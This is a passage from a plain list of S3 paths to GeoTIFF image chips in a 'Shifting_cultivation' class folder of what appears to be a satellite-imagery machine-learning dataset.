's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_600.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_700.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1000_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1000_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1000_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1000_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1200_2800.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1300_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1300_4800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1400_4700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1400_4800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1400_4900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1500_4700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1500_4800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1500_4900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1600_4700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1600_4800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1600_4900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1800_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1800_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1800_4600.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_4600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_4600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_4700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2100_2600.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2100_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2300_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2300_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2300_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2300_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2400_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2400_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2400_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2400_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2500_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2500_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2500_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2500_2800.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2600_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2600_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2600_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_2600.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4500.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3200_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3200_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3300_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3300_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3300_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_3800.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_4100.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_4100.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_4100.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4200_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4200_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4300_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4300_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4400_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4400_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4400_3000.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4500_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4500_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4500_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4500_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4600_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4600_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4600_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4600_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4800_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4800_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4800_4100.tif', 
's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4800_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_2600.tif', 
